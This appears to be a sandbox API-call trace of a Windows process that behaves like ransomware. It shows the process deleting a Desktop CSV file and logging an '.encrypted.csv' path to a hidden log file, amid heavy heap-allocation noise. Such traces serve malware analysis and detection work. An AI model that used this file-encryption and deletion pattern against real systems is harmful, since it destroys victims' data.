[0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.060] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.060] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpwh2letaqsal.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.060] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.061] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.061] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.061] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.061] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.061] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.061] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFilePart=0x0) returned 0x37 [0032.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0x12fde840, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0x7c2240 [0032.062] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wpwh2letaqsal.csv")) returned 1 [0032.063] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0x12fde840, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0 [0032.064] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.064] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.065] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.065] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.065] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.065] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.065] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.066] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.066] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.066] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.066] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0032.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.067] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.068] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xb6a, lpOverlapped=0x0) returned 1 [0032.068] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.068] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xb6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.068] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.encrypted.csv\r\n", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0032.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0032.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.encrypted.csv\r\n", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.encrypted.csv\r\n", lpUsedDefaultChar=0x0) returned 68 [0032.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0032.069] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x43, lpOverlapped=0x0) returned 1 [0032.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.069] CloseHandle (hObject=0x128) returned 1 [0032.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.071] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0032.071] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0032.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.072] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.072] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.073] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.073] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889dd8 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.073] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.073] RtlAllocateHeap 